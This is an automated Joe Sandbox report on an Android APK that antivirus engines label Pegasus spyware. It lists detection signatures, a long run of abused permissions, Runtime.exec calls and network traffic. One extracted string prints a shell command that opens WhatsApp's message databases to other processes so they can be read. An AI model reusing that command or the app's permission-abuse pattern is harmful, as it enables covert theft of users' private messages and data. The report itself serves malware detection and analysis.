Loading Joe Sandbox Report ...

Edit tour

Android Analysis Report
Rqysy4tnfI

Overview

General Information

Sample Name:Rqysy4tnfI
Original Sample Name:9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae
Analysis ID:820413
MD5:cc9517aafb58279091ac17533293edc1
SHA1:28f570754274db96bffa7ac4a53a5ede3508d82c
SHA256:9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Drops a new APK file
Has permission to write to the SMS storage
May access the Android keyguard (lock screen)
Requests permissions only permitted to signed APKs
Has permission to install other packages
Parses SMS data (e.g. originating address)
Has permissions to create, read or change account settings (inlcuding account password settings)
Has permission to receive SMS in the background
Queries a list of installed applications
Has permission to read contacts
Requests permissions only permitted to signed APKs or APKs which are within the system image
May spy on whatsapp messages
Has permission to read low-level log files (spy personal data)
Detected TCP or UDP traffic on non-standard ports
Has permission to draw over other applications or user interfaces
Obfuscates method names
Has permission to delete other packages
Has permission to read the SMS storage
Has permission to use bluetooth to discover and pair with other devices
Queries phone contact information
Has permission to mount or unmount file systems (removable storage)
Has permission to read the phones state (phone number, device IDs, active call ect.)
Has permission to write to the default browser history
Sends SMS using SmsManager
Executes native commands
Has permission to read the default browser history
Has permission to change the WIFI configuration including connecting and disconnecting
Has permission to record audio in the background
Creates SMS data (e.g. PDU)
Requests potentially dangerous permissions
Has permission to send SMS in the background
Has permission to take photos
Has permission to query the list of currently running applications
Has permissions to monitor, redirect and/or block calls
Has permission to terminate background processes of other applications
Has permission to perform phone calls in the background
Has permission to execute code after phone reboot

Classification

No yara matches
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Rqysy4tnfIAvira: detected
Source: Rqysy4tnfIReversingLabs: Detection: 55%
Source: Rqysy4tnfIVirustotal: Detection: 69%Perma Link
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Source: com.binary.sms.receiver.SkeletonActivity$6;->run:28API Call: android.os.Environment.getExternalStorageDirectory
Source: com.binary.sms.receiver.SkeletonActivity$6;->run:30API Call: android.os.Environment.getExternalStorageDirectory
Source: global trafficTCP traffic: 192.168.2.30:56068 -> 8.8.4.4:853
Source: unknownNetwork traffic detected: HTTP traffic on port 39602 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 43100
Source: unknownNetwork traffic detected: HTTP traffic on port 50870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 43100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.212.170
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.212.170
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.42
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 173.194.76.188
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.142
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.212.170
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.212.170
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.212.170
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.163
Source: AndroidManifest.xml, skeleton_activity.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: unknownHTTP traffic detected: POST /c2dm/register3 HTTP/1.1Authorization: AidLogin 3976102378291501644:1184905049225720946app: com.google.android.gmsgcm_ver: 210214031User-Agent: Android-GCM/1.5 (x86 PI)content-length: 477content-type: application/x-www-form-urlencodedHost: android.clients.google.comConnection: Keep-AliveAccept-Encoding: gzip
Source: submitted apkRequest permission: android.permission.RECORD_AUDIO
Source: submitted apkRequest permission: android.permission.CAMERA
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Source: submitted apkRequest permission: com.android.browser.permission.WRITE_HISTORY_BOOKMARKS
Source: com.binary.sms.receiver.SkeletonActivity;->sendDataSmsByManager:688API Call: android.telephony.SmsManager.sendDataMessage
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.PROCESS_OUTGOING_CALLS
Source: submitted apkRequest permission: android.permission.CALL_PHONE
Source: submitted apkRequest permission: android.permission.DELETE_PACKAGES
Source: AndroidManifest.xmlString found in binary or memory: android.permission.DIAGNOSTIC#android.permission.DISABLE_KEYGUARD
Source: submitted apkRequest permission: android.permission.ACCESS_SURFACE_FLINGER
Source: submitted apkRequest permission: android.permission.ACCOUNT_MANAGER
Source: submitted apkRequest permission: android.permission.BIND_DEVICE_ADMIN
Source: submitted apkRequest permission: android.permission.BIND_INPUT_METHOD
Source: submitted apkRequest permission: android.permission.BRICK
Source: submitted apkRequest permission: android.permission.BROADCAST_PACKAGE_REMOVED
Source: submitted apkRequest permission: android.permission.BROADCAST_SMS
Source: submitted apkRequest permission: android.permission.BROADCAST_WAP_PUSH
Source: submitted apkRequest permission: android.permission.CHANGE_COMPONENT_ENABLED_STATE
Source: submitted apkRequest permission: android.permission.CLEAR_APP_USER_DATA
Source: submitted apkRequest permission: android.permission.DEVICE_POWER
Source: submitted apkRequest permission: android.permission.DIAGNOSTIC
Source: submitted apkRequest permission: android.permission.FACTORY_TEST
Source: submitted apkRequest permission: android.permission.FORCE_BACK
Source: submitted apkRequest permission: android.permission.FORCE_STOP_PACKAGES
Source: submitted apkRequest permission: android.permission.HARDWARE_TEST
Source: submitted apkRequest permission: android.permission.INJECT_EVENTS
Source: submitted apkRequest permission: android.permission.INTERNAL_SYSTEM_WINDOW
Source: submitted apkRequest permission: android.permission.MANAGE_APP_TOKENS
Source: submitted apkRequest permission: android.permission.READ_FRAME_BUFFER
Source: submitted apkRequest permission: android.permission.READ_INPUT_STATE
Source: submitted apkRequest permission: android.permission.SET_ACTIVITY_WATCHER
Source: submitted apkRequest permission: android.permission.SET_ORIENTATION
Source: submitted apkRequest permission: android.permission.SET_PREFERRED_APPLICATIONS
Source: submitted apkRequest permission: android.permission.UPDATE_DEVICE_STATS
Source: submitted apkRequest permission: android.permission.ACCESS_CHECKIN_PROPERTIES
Source: submitted apkRequest permission: android.permission.BIND_APPWIDGET
Source: submitted apkRequest permission: android.permission.BIND_WALLPAPER
Source: submitted apkRequest permission: android.permission.CALL_PRIVILEGED
Source: submitted apkRequest permission: android.permission.CONTROL_LOCATION_UPDATES
Source: submitted apkRequest permission: android.permission.DELETE_CACHE_FILES
Source: submitted apkRequest permission: android.permission.DELETE_PACKAGES
Source: submitted apkRequest permission: android.permission.GLOBAL_SEARCH
Source: submitted apkRequest permission: android.permission.INSTALL_LOCATION_PROVIDER
Source: submitted apkRequest permission: android.permission.INSTALL_PACKAGES
Source: submitted apkRequest permission: android.permission.MASTER_CLEAR
Source: submitted apkRequest permission: android.permission.REBOOT
Source: submitted apkRequest permission: android.permission.SET_TIME
Source: submitted apkRequest permission: android.permission.STATUS_BAR
Source: submitted apkRequest permission: android.permission.WRITE_GSERVICES
Source: submitted apkRequest permission: android.permission.WRITE_SECURE_SETTINGS
Source: com.binary.sms.receiver.SkeletonActivity$7;->chmodOneCommand:32API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity$7;->sume:75API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity$8;->sume:45API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity$9;->sume:32API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity;->chmodCsk:259API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity;->chmodOneCommand:302API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity;->chmodSU:331API Call: java.lang.Runtime.exec
Source: com.binary.sms.receiver.SkeletonActivity;->runProcess:634API Call: java.lang.Runtime.exec
Source: submitted apkRequest permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apkRequest permission: android.permission.ACCESS_FINE_LOCATION
Source: submitted apkRequest permission: android.permission.ACCESS_MOCK_LOCATION
Source: submitted apkRequest permission: android.permission.AUTHENTICATE_ACCOUNTS
Source: submitted apkRequest permission: android.permission.BLUETOOTH
Source: submitted apkRequest permission: android.permission.BLUETOOTH_ADMIN
Source: submitted apkRequest permission: android.permission.CALL_PHONE
Source: submitted apkRequest permission: android.permission.CAMERA
Source: submitted apkRequest permission: android.permission.CHANGE_CONFIGURATION
Source: submitted apkRequest permission: android.permission.CHANGE_NETWORK_STATE
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_MULTICAST_STATE
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apkRequest permission: android.permission.CLEAR_APP_CACHE
Source: submitted apkRequest permission: android.permission.DUMP
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.MANAGE_ACCOUNTS
Source: submitted apkRequest permission: android.permission.MODIFY_AUDIO_SETTINGS
Source: submitted apkRequest permission: android.permission.MODIFY_PHONE_STATE
Source: submitted apkRequest permission: android.permission.MOUNT_FORMAT_FILESYSTEMS
Source: submitted apkRequest permission: android.permission.MOUNT_UNMOUNT_FILESYSTEMS
Source: submitted apkRequest permission: android.permission.PERSISTENT_ACTIVITY
Source: submitted apkRequest permission: android.permission.PROCESS_OUTGOING_CALLS
Source: submitted apkRequest permission: android.permission.READ_CALENDAR
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Source: submitted apkRequest permission: android.permission.READ_LOGS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_MMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_WAP_PUSH
Source: submitted apkRequest permission: android.permission.RECORD_AUDIO
Source: submitted apkRequest permission: android.permission.REORDER_TASKS
Source: submitted apkRequest permission: android.permission.SEND_SMS
Source: submitted apkRequest permission: android.permission.SET_ALWAYS_FINISH
Source: submitted apkRequest permission: android.permission.SET_ANIMATION_SCALE
Source: submitted apkRequest permission: android.permission.SET_DEBUG_APP
Source: submitted apkRequest permission: android.permission.SET_PROCESS_LIMIT
Source: submitted apkRequest permission: android.permission.SET_TIME_ZONE
Source: submitted apkRequest permission: android.permission.SIGNAL_PERSISTENT_PROCESSES
Source: submitted apkRequest permission: android.permission.SUBSCRIBED_FEEDS_WRITE
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apkRequest permission: android.permission.USE_CREDENTIALS
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_APN_SETTINGS
Source: submitted apkRequest permission: android.permission.WRITE_CALENDAR
Source: submitted apkRequest permission: android.permission.WRITE_CONTACTS
Source: submitted apkRequest permission: android.permission.WRITE_EXTERNAL_STORAGE
Source: submitted apkRequest permission: android.permission.WRITE_SETTINGS
Source: submitted apkRequest permission: android.permission.WRITE_SMS
Source: submitted apkRequest permission: android.permission.WRITE_SYNC_SETTINGS
Source: submitted apkRequest permission: com.android.browser.permission.READ_HISTORY_BOOKMARKS
Source: submitted apkRequest permission: com.android.browser.permission.WRITE_HISTORY_BOOKMARKS
Source: classification engineClassification label: mal60.spyw.and@0/41@0/0
Source: Rqysy4tnfITotal valid method names: 67%

Persistence and Installation Behavior

barindex
Source: Android AppFile dump: /data/app/com.binary.sms.receiver-LBoSWVwk6FZGrT9hLfrOGw==/base.apkJump to dropped file
Source: submitted apkRequest permission: android.permission.INSTALL_PACKAGES
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apkRequest permission: android.permission.BLUETOOTH_ADMIN
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.PROCESS_OUTGOING_CALLS
Source: submitted apkRequest permission: android.permission.KILL_BACKGROUND_PROCESSES
Source: com.binary.sms.receiver.SmsReceiver$1;->run:37API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: submitted apkRequest permission: android.permission.AUTHENTICATE_ACCOUNTS
Source: submitted apkRequest permission: android.permission.GET_ACCOUNTS
Source: submitted apkRequest permission: android.permission.MANAGE_ACCOUNTS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: com.binary.sms.receiver.SkeletonActivity;->getApkInfos:383API Call: android.content.pm.PackageManager.getInstalledApplications
Source: submitted apkRequest permission: android.permission.READ_CONTACTS
Source: Lcom/binary/sms/receiver/SkeletonActivity;->chmodOneCommand(Ljava/io/File;Ljava/lang/String;)VMethod string: "export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 7777 /data/data/com.whatsapp/; chmod 7777 /data/data/com.whatsapp/databases/; chmod 777 /data/data/com.whatsapp/databases/msgstore.db; chmod 7777 /data/data/com.whatsapp/databases/wa.db ;chmod 7777 /data/data/com.whatsapp/shared_prefs/com.whatsapp_preferences.xml;"
Source: submitted apkRequest permission: android.permission.READ_LOGS
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: com.binary.sms.receiver.SkeletonActivity;->onActivityResult:516Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: com.android.browser.permission.READ_HISTORY_BOOKMARKS
Source: com.binary.sms.receiver.SmsReceiver$1;->run:36API Call: android.telephony.SmsMessage.createFromPdu
Source: submitted apkRequest permission: android.permission.ACCESS_COARSE_LOCATION
Source: submitted apkRequest permission: android.permission.ACCESS_FINE_LOCATION
Source: submitted apkRequest permission: android.permission.MOUNT_UNMOUNT_FILESYSTEMS
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath Interception2
Application Discovery
1
Access Sensitive Data in Device Logs
1
Location Tracking
Remote Services1
Access Contact List
Exfiltration Over Other Network Medium1
Encrypted Channel
3
Exploit SS7 to Redirect Phone Calls/SMS
Remotely Track Device Without Authorization1
Delete Device Data
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information
1
Access Stored Application Data
2
Application Discovery
Remote Desktop Protocol1
Location Tracking
Exfiltration Over Bluetooth1
Non-Standard Port
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
Carrier Billing Fraud
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin Shares1
Capture Audio
Automated Exfiltration1
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object Model1
Network Information Discovery
Scheduled Transfer2
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSH1
Access Sensitive Data in Device Logs
Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User DiscoveryVNC1
Access Stored Application Data
Exfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


android-buttoncam-android
SourceDetectionScannerLabelLink
Rqysy4tnfI100%AviraANDROID/Pegasus.FKAQ.Gen
Rqysy4tnfI55%ReversingLabsAndroid.Spyware.Pegasus
Rqysy4tnfI70%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://schemas.android.com/apk/res/androidAndroidManifest.xml, skeleton_activity.xmlfalse
    high
    No contacted IP infos
    Joe Sandbox Version:37.0.0 Beryl
    Analysis ID:820413
    Start date and time:2023-03-06 08:13:46 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 20s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultandroidfilecookbook.jbs
    Analysis system description:Android 9 (Pie)
    Analysis Mode:default
    APK Instrumentation enabled:true
    Sample file name:Rqysy4tnfI
    Original Sample Name:9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae
    Detection:MAL
    Classification:mal60.spyw.and@0/41@0/0
    • Not all non-executed APIs are in report
    No context
    No context
    No context
    No context
    No context
    File Type:troff or preprocessor input, ASCII text
    Category:dropped
    Size (bytes):30
    Entropy (8bit):3.5810760119146074
    Encrypted:false
    SSDEEP:3:HNxQUSS5Zwon:LQm5ao
    MD5:574289C6EB17B160C46CAED1C1E1E400
    SHA1:AF39B2AF781569152F193A1B2AC3B366CF369726
    SHA-256:846F972EA91473EBA7F0174B6F46E43A4BD02A7264C78BAF1B33BE9A1A5975CF
    SHA-512:43C43ACE765103C548D7A028592A925424CD25C59C88302D67EE7D30A2923ABAF88AE237BCBBD377A975D5E16E3BF3A4387951E8586552A83EC5E98E18B9432B
    Malicious:true
    Reputation:low
    Preview:\"uptime\.\"1055177\\"1055203\
    File type:Java archive data (JAR)
    Entropy (8bit):7.837202336378295
    TrID:
    • Android Package (27504/1) 56.12%
    • Java Archive (13504/1) 27.55%
    • ZIP compressed archive (8000/1) 16.32%
    File name:Rqysy4tnfI
    File size:59056
    MD5:cc9517aafb58279091ac17533293edc1
    SHA1:28f570754274db96bffa7ac4a53a5ede3508d82c
    SHA256:9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae
    SHA512:2fb55d4ceb8da9a01d5bf0a9725ee601a252b541f29186311bbc3c515b4cfa3e52107f856f381cfb643b1d2398099c6c0747f1b01baf37e68fd273684fc93fe5
    SSDEEP:1536:kdJw+W4W0bQjcK2eZk7A6loQ17y23V9zEj:n/sQQK2mkE6l5I2Fxw
    TLSH:DA43E18187D08726E23F93302AF1655074753C411E9AE72A1181F65B8FABFF89B41B7E
    File Content Preview:PK...........?m...............res/drawable/violet.jpg.............JFIF.....H.H......Exif..II*........... ...................................................................(...........2.......................i...............
    Label:Binary SMS Receiver
    Minimum SDK required:8
    Target SDK required:8
    Version Code:1
    Version Name:1
    Package Name:com.binary.sms.receiver
    Is Activity:true
    Is Receiver:true
    Is Service:false
    Requests System Level Permissions:false
    Play Store Compatible:true
    NameIs Entrypoint
    com.binary.sms.receivercom.binary.sms.receiver.SkeletonActivitytrue
    • com.binary.sms.receiver.SmsReceiver
    • Intent: android.intent.action.DATA_SMS_RECEIVED (Priority 100)
    • android.permission.ACCESS_CHECKIN_PROPERTIES
    • android.permission.ACCESS_COARSE_LOCATION
    • android.permission.ACCESS_FINE_LOCATION
    • android.permission.ACCESS_LOCATION_EXTRA_COMMANDS
    • android.permission.ACCESS_MOCK_LOCATION
    • android.permission.ACCESS_NETWORK_STATE
    • android.permission.ACCESS_SURFACE_FLINGER
    • android.permission.ACCESS_WIFI_STATE
    • android.permission.ACCOUNT_MANAGER
    • android.permission.AUTHENTICATE_ACCOUNTS
    • android.permission.BATTERY_STATS
    • android.permission.BIND_APPWIDGET
    • android.permission.BIND_DEVICE_ADMIN
    • android.permission.BIND_INPUT_METHOD
    • android.permission.BIND_REMOTEVIEWS
    • android.permission.BIND_WALLPAPER
    • android.permission.BLUETOOTH
    • android.permission.BLUETOOTH_ADMIN
    • android.permission.BRICK
    • android.permission.BROADCAST_PACKAGE_REMOVED
    • android.permission.BROADCAST_SMS
    • android.permission.BROADCAST_STICKY
    • android.permission.BROADCAST_WAP_PUSH
    • android.permission.CALL_PHONE
    • android.permission.CALL_PRIVILEGED
    • android.permission.CAMERA
    • android.permission.CHANGE_COMPONENT_ENABLED_STATE
    • android.permission.CHANGE_CONFIGURATION
    • android.permission.CHANGE_NETWORK_STATE
    • android.permission.CHANGE_WIFI_MULTICAST_STATE
    • android.permission.CHANGE_WIFI_STATE
    • android.permission.CLEAR_APP_CACHE
    • android.permission.CLEAR_APP_USER_DATA
    • android.permission.CONTROL_LOCATION_UPDATES
    • android.permission.DELETE_CACHE_FILES
    • android.permission.DELETE_PACKAGES
    • android.permission.DEVICE_POWER
    • android.permission.DIAGNOSTIC
    • android.permission.DISABLE_KEYGUARD
    • android.permission.DUMP
    • android.permission.EXPAND_STATUS_BAR
    • android.permission.FACTORY_TEST
    • android.permission.FLASHLIGHT
    • android.permission.FORCE_BACK
    • android.permission.FORCE_STOP_PACKAGES
    • android.permission.GET_ACCOUNTS
    • android.permission.GET_PACKAGE_SIZE
    • android.permission.GET_TASKS
    • android.permission.GLOBAL_SEARCH
    • android.permission.HARDWARE_TEST
    • android.permission.INJECT_EVENTS
    • android.permission.INSTALL_LOCATION_PROVIDER
    • android.permission.INSTALL_PACKAGES
    • android.permission.INTERNAL_SYSTEM_WINDOW
    • android.permission.INTERNET
    • android.permission.KILL_BACKGROUND_PROCESSES
    • android.permission.MANAGE_ACCOUNTS
    • android.permission.MANAGE_APP_TOKENS
    • android.permission.MASTER_CLEAR
    • android.permission.MODIFY_AUDIO_SETTINGS
    • android.permission.MODIFY_PHONE_STATE
    • android.permission.MOUNT_FORMAT_FILESYSTEMS
    • android.permission.MOUNT_UNMOUNT_FILESYSTEMS
    • android.permission.NFC
    • android.permission.PERSISTENT_ACTIVITY
    • android.permission.PROCESS_OUTGOING_CALLS
    • android.permission.READ_CALENDAR
    • android.permission.READ_CONTACTS
    • android.permission.READ_FRAME_BUFFER
    • android.permission.READ_HISTORY_BOOKMARKS
    • android.permission.READ_INPUT_STATE
    • android.permission.READ_LOGS
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_SMS
    • android.permission.READ_SYNC_SETTINGS
    • android.permission.READ_SYNC_STATS
    • android.permission.REBOOT
    • android.permission.RECEIVE_BOOT_COMPLETED
    • android.permission.RECEIVE_MMS
    • android.permission.RECEIVE_SMS
    • android.permission.RECEIVE_WAP_PUSH
    • android.permission.RECORD_AUDIO
    • android.permission.REORDER_TASKS
    • android.permission.RESTART_PACKAGES
    • android.permission.SEND_SMS
    • android.permission.SET_ACTIVITY_WATCHER
    • android.permission.SET_ALARM
    • android.permission.SET_ALWAYS_FINISH
    • android.permission.SET_ANIMATION_SCALE
    • android.permission.SET_DEBUG_APP
    • android.permission.SET_ORIENTATION
    • android.permission.SET_PREFERRED_APPLICATIONS
    • android.permission.SET_PROCESS_LIMIT
    • android.permission.SET_TIME
    • android.permission.SET_TIME_ZONE
    • android.permission.SET_WALLPAPER
    • android.permission.SET_WALLPAPER_HINTS
    • android.permission.SIGNAL_PERSISTENT_PROCESSES
    • android.permission.STATUS_BAR
    • android.permission.SUBSCRIBED_FEEDS_READ
    • android.permission.SUBSCRIBED_FEEDS_WRITE
    • android.permission.SYSTEM_ALERT_WINDOW
    • android.permission.UPDATE_DEVICE_STATS
    • android.permission.USE_CREDENTIALS
    • android.permission.USE_SIP
    • android.permission.VIBRATE
    • android.permission.WAKE_LOCK
    • android.permission.WRITE_APN_SETTINGS
    • android.permission.WRITE_CALENDAR
    • android.permission.WRITE_CONTACTS
    • android.permission.WRITE_EXTERNAL_STORAGE
    • android.permission.WRITE_GSERVICES
    • android.permission.WRITE_HISTORY_BOOKMARKS
    • android.permission.WRITE_SECURE_SETTINGS
    • android.permission.WRITE_SETTINGS
    • android.permission.WRITE_SMS
    • android.permission.WRITE_SYNC_SETTINGS
    • com.android.browser.permission.READ_HISTORY_BOOKMARKS
    • com.android.browser.permission.WRITE_HISTORY_BOOKMARKS
    • com.android.email.permission.ACCESS_PROVIDER
    • com.android.email.provider.EmailProvider
    Name:
    Issuer:CN=android,OU=android
    Subject:CN=android,OU=android
    NameTypeSize
    CERT.SFASCII text, with CRLF line terminators816
    CERT.RSAdata1148
    AndroidManifest.xmlAndroid binary XML21424
    classes.dexDalvik dex file version 03547520
    ic_launcher.pngPNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced7266
    MANIFEST.MFASCII text, with CRLF line terminators763
    resources.arscdata3032
    skeleton_activity.xmlAndroid binary XML2640
    ic_launcher.pngPNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced5123
    violet.jpgJPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, description= , manufacturer=SONY, model=CYBERSHOT, orientation=upper-left, xresolution=182, yresolution=190, resolutionunit=2, datetime=2001:12:20 22:47:05], baseline, precision 8, 32x32, components 32492
    ic_launcher.pngPNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced12281
    ic_launcher.pngPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced2935
    base.apk.drtroff or preprocessor input, ASCII text30
    TimestampSource PortDest PortSource IPDest IP
    Mar 6, 2023 08:14:04.319410086 CET50458443192.168.2.30216.58.212.170
    Mar 6, 2023 08:14:04.511476994 CET39602443192.168.2.30142.250.186.163
    Mar 6, 2023 08:14:08.223833084 CET50458443192.168.2.30216.58.212.170
    Mar 6, 2023 08:14:08.543781042 CET39602443192.168.2.30142.250.186.163
    Mar 6, 2023 08:14:08.646992922 CET50870443192.168.2.30142.250.186.42
    Mar 6, 2023 08:14:09.194911003 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.211919069 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.212119102 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.215456009 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.232469082 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.240246058 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.240309954 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.240361929 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.240431070 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.240430117 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.240430117 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.240430117 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.240500927 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.248826981 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.266103983 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.266341925 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.284395933 CET853560688.8.4.4192.168.2.30
    Mar 6, 2023 08:14:09.297374964 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.324831009 CET56068853192.168.2.308.8.4.4
    Mar 6, 2023 08:14:09.330310106 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.330533028 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.332334042 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.365513086 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.366031885 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.366085052 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.366132975 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.366161108 CET526305228192.168.2.30173.194.76.188
    Mar 6, 2023 08:14:09.366178989 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.366226912 CET522852630173.194.76.188192.168.2.30
    Mar 6, 2023 08:14:09.366266966 CET522852630173.194.76.188192.168.2.30
